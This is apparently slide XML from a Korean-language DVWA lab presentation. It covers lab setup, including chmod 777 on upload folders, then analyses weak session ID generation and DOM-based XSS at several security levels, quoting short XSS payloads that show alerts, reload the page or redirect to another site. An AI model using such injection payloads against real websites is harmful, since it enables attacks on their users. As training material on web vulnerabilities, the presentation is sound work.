          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="5546455"/>
            <a:ext cx="1365945" cy="2066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70309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" b="744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security level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쿠키 값을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time()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이용해 반환 받은 시간 값을 사용해서 몇 개의 쿠키 값을 생성해 비교해보면 패턴을 추측이 가능하였다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security level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md5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알고리즘을 이용해 암호화를 한 값을 쿠키 값으로 사용하여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단계보다는 패턴을 예측하기 힘들다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쉽게 복호화가 되어서 복호화 후 값을 확인해보면 쿠키 값이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씩 증가해 다음 값을 예측할 수 있다는 단점이 존재한다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600926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Impossible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7" b="2877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Impossible security level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확인하기 위해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Security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 탭에서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Impossible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바꾸고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눌러준다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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5797821"/>
            <a:ext cx="1226916" cy="1862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0B46C7-696E-4F84-85F0-4D5F61119C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467336" y="4876764"/>
            <a:ext cx="1433332" cy="1929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53259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Impossible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1" b="3011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Weak Session IDs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선택하고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Generate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버튼을 클릭해   쿠키 값을 생성한다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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5786246"/>
            <a:ext cx="1226916" cy="1862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0B46C7-696E-4F84-85F0-4D5F61119C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455760" y="3976625"/>
            <a:ext cx="762002" cy="21341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068307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Impossible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" b="3927"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477578" y="1990045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도구를 통해 패킷을 보면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확인할 수  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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150620" y="4461114"/>
            <a:ext cx="655320" cy="15851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0B46C7-696E-4F84-85F0-4D5F61119C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="472380" y="4084321"/>
            <a:ext cx="5735380" cy="1209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94F609-7E72-43BB-B45E-2FD3049CB487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226820" y="5790804"/>
            <a:ext cx="2407920" cy="1209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109323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Impossible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3" b="2643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477578" y="1990045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패턴을 파악할 수 없어 소스코드를 확인하기 위해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Source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버튼을 클릭해 코드를 확인한다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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329237" y="4481513"/>
            <a:ext cx="645103" cy="1536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923724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Impossible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4" b="2824"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477578" y="1990045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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579119" y="3032760"/>
            <a:ext cx="5678805" cy="12954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81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B2DB40D-D024-43AA-9F8F-F8B80E87B0C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6464" y="533400"/>
            <a:ext cx="5485072" cy="8463965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3. DVWA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를 활용한 취약점 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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1) Brute Force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2) Command Injection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3) CSRF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4) File Inclusion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5) File Upload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6) Insecure CAPTCHA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7) SQL Injection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8) SQL Injection (Blind)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9) Weak Session IDs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10) XSS (DOM)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11) XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Refliected</a:t>
            </a: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12) XSS (Stored)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13) CSP Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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정리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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1822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폴더들 권한주기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0921" y="57077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폴더들의 권한을 소유자 및 그룹 사용자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기타 사용자까지 모두 읽고 쓰고 실행할 수 있는 권한으로 부여한다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바뀐 설정들을 적용하기위해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XAMPP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다시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Restart All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눌러준다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3660542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console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chmod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777 /opt/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lampp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htdocs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/hackable/uploads/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chmod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777 /opt/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lampp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htdocs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dvwa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/external/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phpids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/0.6/lib/IDS/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tmp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/phpids_log.txt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946771E-E9EC-459C-85B9-6D347BFA76FB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835088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3-9) Weak Session IDs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Impossible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&lt;?php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$html = “”;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if($_SERVER[‘REQUEST_METHOD’] == “POST”)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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mt_rand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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함수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600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반환값으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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받은 난수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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sha1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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암호화 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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ko-KR" altLang="en-US" sz="16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알고리즘을 이용해 암호화 한 값을 쿠키 값으로 사용한다</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600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$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cookie_value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= sha1(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mt_rand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. time() . 	“Impossible”);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setcookie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(“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dvwaSession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”,  	$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cookie_value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time()+3600, 	“/vulnerabilities/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weak_id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”, 	$_SERVER[‘HTTP_HOST’], true, true);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?&gt;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813921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9A351A-DCCD-4BAC-94BF-632B61B5151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7D94560D-C34C-4211-8812-E8601EBA9B8D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16541F1C-A245-42F8-8FC8-701268C41998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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE419C1-CCEB-48FC-84BE-079C3DB5FC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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XSS (DOM)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66579-EDC9-4324-B476-6FF19928A34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-77039" y="3309457"/>
            <a:ext cx="24628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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" alt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904615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(DOM)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이란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환경에서 악성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사용자의 브라우저를 공격하는 방식이다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DOM (Document Object Model) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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W3C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표준으로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XML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문서에 접근방법을 표준으로 정의하는 문서 객체모델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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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문서를 계층적으로 보면서 컨텐츠를 동적으로 변경할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방식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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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 자체는 변하지 않는다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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ"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페이지에 포함되어 있는 브라우저측 코드가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환경에서 악성코드로 실행된다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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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기반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취약점이 있는 브라우저를 대상으로 조작된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이메일을 통해 사용자에게 전송하면 피해자는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링크를 클릭하는 순간 공격 피해를 입게 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Stored XSS, Reflected XSS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차이점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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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Stored XSS, Reflected XSS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악성 페이로드가 서버 측 애플리케이션 취약점으로 인해 응답 페이지에 악성 스크립트가 포함되어 브라우저로 전달되면서 공격을 수행한다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buFont typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:buChar char="ￚ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DOM XSS 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서버와 관계없이 브라우저에서 발생한다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F5038C-C38B-4728-9078-0A22AA4F9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651" y="7419915"/>
            <a:ext cx="3294698" cy="205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19552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048ED25-8D7B-426C-BA71-4D576E96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60" y="2162039"/>
            <a:ext cx="5442579" cy="39936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E6D7AC-1FA8-423C-B8A5-34A3F297396F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684612" y="1694934"/>
            <a:ext cx="380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Security Level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Low level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로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20E1B1-C98E-47AE-8A4D-6F1F66E0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97" y="7009803"/>
            <a:ext cx="5348288" cy="2423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E2902C-920D-4A4B-B91B-4B1A9E9E71AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684612" y="6376171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Low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level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에서는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모든 스크립트 문이 적혀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55417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F0B321-3134-449D-A842-0BFBB668295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2049693-E6FF-4F1F-97C4-5378BB237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81" y="5776161"/>
            <a:ext cx="5867487" cy="218949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C01EB34-2449-42FD-B2E9-A36FEA1D2B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849089" y="6548912"/>
            <a:ext cx="685800" cy="245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EAB6E9-59B3-4588-A2FE-0FAC36CE161E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003076" y="1834629"/>
            <a:ext cx="62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TEST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E90AC4-3E4F-4206-908A-C929E29E7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4" b="27912"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="2431835"/>
            <a:ext cx="5867487" cy="20146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72041D-8C91-4D67-9BE5-1A74F018C2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822201" y="5381428"/>
            <a:ext cx="316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English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를 고르고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Select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클릭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317D25-77D5-44E1-A200-A421FC47427F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803398" y="2431835"/>
            <a:ext cx="2026887" cy="3037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0FA76-7EA9-4DAC-B734-765A0E79184F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631450" y="8390769"/>
            <a:ext cx="33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Default=English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가 붙었음을 확인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6D5D7E9-B127-40D5-9633-287D90F95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1" y="8795027"/>
            <a:ext cx="5821797" cy="50534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9F9883-CA84-4085-8EA1-8B909E82C29F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624324" y="8799210"/>
            <a:ext cx="1002001" cy="328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0184995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B7F8427B-14DA-42D3-B99E-4D37C2C288F8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1EAB6E9-59B3-4588-A2FE-0FAC36CE161E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003076" y="183462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TEST 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72041D-8C91-4D67-9BE5-1A74F018C2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376187" y="2130231"/>
            <a:ext cx="3968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스크립트 입력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&lt;script&gt; alert(“XSS TEST”) &lt;/script&gt;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20FA76-7EA9-4DAC-B734-765A0E79184F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809391" y="3863734"/>
            <a:ext cx="3239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Alert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명령어에 의해 경고창에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XSS test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라는 문구가 뜬다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59128B-9E68-4569-8E90-A2A071856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1" y="2882275"/>
            <a:ext cx="5785423" cy="79828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C4317D25-77D5-44E1-A200-A421FC47427F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003077" y="3065448"/>
            <a:ext cx="3209038" cy="3141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F8C49C-3D73-4C69-807F-27303103D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5" y="4522423"/>
            <a:ext cx="5943414" cy="31390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3C8DD3-C095-4CA3-B4D1-DD8622BCD575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323064" y="8269263"/>
            <a:ext cx="4188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Test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결과 모든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test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에서 스크립트 문이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별도의 필터 없이 통과됨을 알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0692113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Low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DE6D7AC-1FA8-423C-B8A5-34A3F297396F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1837372" y="1783049"/>
            <a:ext cx="2954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Security Level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을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Impossible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level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로 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23322A-21CE-4A5A-A3DB-2F7190C93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08" y="2484684"/>
            <a:ext cx="6019384" cy="271409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5EA66D0-D98E-4E2E-863B-2A2296EE7E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2027187" y="4076436"/>
            <a:ext cx="1349252" cy="2260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2CAFF1-1A97-4AE8-8FC9-4A98408F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1" y="5845109"/>
            <a:ext cx="5889554" cy="2721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7CDE6C-BFAC-4E57-9E05-C00E9AB500CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551740" y="5249583"/>
            <a:ext cx="5573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Impossible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level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에서 아무것도 할 필요가 없으며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클라이언트 측에서 더 방어가 필요하다고 되어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596853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" b="3179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security level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설정하기 위해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Security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선택한 후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76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900112" y="6183588"/>
            <a:ext cx="1226916" cy="1862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0B46C7-696E-4F84-85F0-4D5F61119C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438761" y="5289377"/>
            <a:ext cx="1433332" cy="19294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312965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" b="3113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DOM based XSS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공격을 하기 위해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XSS(DOM)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메뉴를 선택한다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E76CA6E-FE69-49F8-B622-0AF6A2C5CCCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900112" y="5962608"/>
            <a:ext cx="1226916" cy="18628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0B46C7-696E-4F84-85F0-4D5F61119C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2598034" y="4157997"/>
            <a:ext cx="1295786" cy="19302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615127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" r="3040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default=English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뒤에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                                                         &lt;/option&gt;&lt;/select&gt;&lt;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=‘’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window.location.reload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(true)&gt;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입력하면 입력한 값이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document.write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(“&lt;option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value=‘” + lang + “’&gt;” +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decodeURI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(lang) +…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구문에서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decodeURI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(lang)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들어가게 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그러면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document.write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(“&lt;option value=‘” + lang + “’&gt;” + &lt;/option&gt;&lt;/select&gt;&lt;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=‘’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window.location.reload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(true)&gt;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되어 강제적으로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option, select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태그를 닫고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존재하지 않는 값인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‘’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지정하여 의도적으로 오류를 일으켜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구문이 동작되게 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구문으로 지정한 스크립트문을 보면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window.location.reload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(true)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인데 구문이 실행이 되면 페이지가 새로 고쳐진다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082C7F-AB57-4854-BE90-339F6B69613D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928914" y="2546861"/>
            <a:ext cx="5193756" cy="2032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9F4076-C122-4014-ADC1-2621CCBCB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4888078"/>
            <a:ext cx="5917545" cy="1752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5AD95374-05AC-4271-B36D-B3E8DA0B8EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333500" y="5475719"/>
            <a:ext cx="4502150" cy="14403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274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설정 완료 창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11BB5097-AEC5-4D2A-9659-ACB4BF9336B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5" b="2595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마지막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줄 빼고는 모든 항목들이 잘 설정된 것을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이제 맨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아래있는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Create/ Reset Database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클릭하여 원래 데이타베이스를 덮어씌우거나 새로 만들기를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7E0DBC3-60C6-476C-B87A-8313CB84F2EC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5251440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1" b="3671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window.location.assign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https://www.naver.com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)&gt;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구문을 통해서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https://www.naver.com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페이지가 띄워진다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F7C91E-AF51-430E-8D3D-E10849338D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946784" y="2288524"/>
            <a:ext cx="5194935" cy="19559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342978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" b="1152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사용자가 입력한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뒤에 입력한 스크립트문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(~~=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window.location.assign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(“~~~”))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이용해 사용자가 입력한 웹 사이트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(ex&gt;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4"/>
              </a:rPr>
              <a:t>http://www.naver.com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이동이 된 것을 확인하였다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이러한 취약점을 이용하면 타겟이 공격자가 지정한 사이트로 이동이 되도록 할 수 있고 이후 추가적인 공격을 통해 타겟에 피해를 발생시킬 수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418886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" b="1710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security level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코드를 보기 위해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XSS(DOM)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메뉴에 들어간 다음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Source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4E5E953-13B2-4009-A520-679019994E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371601" y="4724400"/>
            <a:ext cx="792479" cy="1143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D694229-D322-4957-8BF3-AA9BA74B08CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4701541" y="6145536"/>
            <a:ext cx="403860" cy="1104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74727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9539" y="1968498"/>
            <a:ext cx="6004619" cy="695378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&lt;?php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 (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array_key_exists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“default”, $_GET ) &amp;&amp; !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is_null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($_GET[  ‘default’ ]) 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$default = $_GET[‘default’];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GET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메소드로 받은 값에 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(&lt;script)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존재하면 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if (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stripos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($default, “&lt;script”) !== false)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입력한 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태그는 무시하고 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?default=English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              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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지정한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="14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header (“location: ?default=English”);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exit;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}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?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C375E9FF-77C9-4BF5-89E5-B1D5F73D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4335" r="1720" b="72962"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="377273" y="1968498"/>
            <a:ext cx="5994000" cy="1144764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8EDD7E3-759B-4DC1-A2E7-56C6E7FA32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" t="64756" r="2479" b="17350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="377273" y="8201676"/>
            <a:ext cx="5994000" cy="720603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631037890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" b="910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레벨의 코드와 비교를 하기 위해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Compare All Levels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FBC1C52-6849-4D2A-B5DE-58FFBCD8C330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563480" y="5206998"/>
            <a:ext cx="1354220" cy="24130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21597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Medium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4E60D05-ADD1-4D38-A18A-E7F82AA0B09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" b="910"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx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security level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security level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과는 달리 어떠한     태그도 검사하지 않고 그대로 실행을 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그래서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?default=English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뒤에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태그를 이용해 뒤에 오는 구문을 실행할 수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security level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문을 통해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태그를 검사하여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뒤에 입력한 구문에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태그가 존재할 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?default=English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지정하여 사용자가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입력한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태그를 무시한다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&lt;/option&gt;&lt;/select&gt;&lt;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=‘’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=~~~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문을 입력하면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뒤에 사용자가 입력한 스크립트가 실행이 되기 때문에 안전하지 않다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49780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Security Level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High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설정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Submit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9BD8AF-DDEB-4F0A-8C32-A01FEA662098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1211692" y="2212324"/>
            <a:ext cx="270266" cy="16826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8B8935E7-82BE-49E8-AFB9-E96E83D5C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91" y="1832970"/>
            <a:ext cx="5913238" cy="47540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EB77566-880E-4B2C-9168-4683D2D75A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920664" y="4861771"/>
            <a:ext cx="726289" cy="168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0B89AA-37F3-4EC8-9732-FB2CFDE7376D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2698950" y="4857416"/>
            <a:ext cx="545672" cy="168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165527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XSS(DOM)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3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192.168.0.189/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/vulnerabilities/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xss_d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7EA84EF-737E-480D-833C-D8C9280FC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0" y="1892663"/>
            <a:ext cx="5901779" cy="43117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8FE152-F997-4427-8F1C-92758E5E5F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628723" y="5261318"/>
            <a:ext cx="1063360" cy="168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6056D3B9-EF1C-47CA-875C-07E1CB841BB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6A118C-5851-4DE3-9F43-A9C2684197F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839304" y="1956668"/>
            <a:ext cx="2279408" cy="1858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969561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English -&gt; Select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확인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192.168.0.189/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/vulnerabilities/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xss_d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/?default=English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1270BE1C-E9A5-411F-8EEC-E8B1DB5F3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880"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1887551"/>
            <a:ext cx="5901779" cy="42191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8FE152-F997-4427-8F1C-92758E5E5F28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690371" y="1923894"/>
            <a:ext cx="3239133" cy="168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D4A1BD-76B0-4354-A11C-825658E7F40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084995" y="3571854"/>
            <a:ext cx="645141" cy="2555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6056D3B9-EF1C-47CA-875C-07E1CB841BB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66D0CF4-2447-4E2A-BB51-DA37F06CC9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2763644" y="3567499"/>
            <a:ext cx="533175" cy="2555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984848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 : [192.168.0.189/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/vulnerabilities/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xss_d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/?default=English]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뒷부분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#&lt;script&gt;alert(＇warning＇)&lt;/script&gt;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6A9EBE9B-93E0-4BE9-9D67-9205E8CD0A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3" t="-531" r="3704" b="80036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="566540" y="1896599"/>
            <a:ext cx="5794556" cy="113877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E016266-5B41-4012-9E60-0297D1234223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604646" y="1977233"/>
            <a:ext cx="3239133" cy="168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1E929D9A-D9C9-4DFC-8165-DC04EDBB898E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="3132905"/>
            <a:ext cx="0" cy="4572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65A4205-9294-4C55-8650-D44922BDB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3" t="-531" r="3704" b="80036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="559526" y="3715436"/>
            <a:ext cx="5794556" cy="11387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93C16A-1253-4D92-8753-F0637E8E2B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15" t="6355" r="6424" b="8391"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="554385" y="3778692"/>
            <a:ext cx="5522565" cy="20172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51155AD-DAA4-4AEE-B6A0-D7A1660AFAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3666195" y="3801678"/>
            <a:ext cx="1836088" cy="168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17DD0BD-88E3-4521-8A3A-4702E4379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89" y="5102169"/>
            <a:ext cx="4600303" cy="1763153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C921AD7E-3D84-4484-AC5A-68438E6D1DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483841" y="1867997"/>
            <a:ext cx="5962797" cy="3048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38D570-00B7-4DC7-9CDD-BF14874DCCDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479485" y="5076042"/>
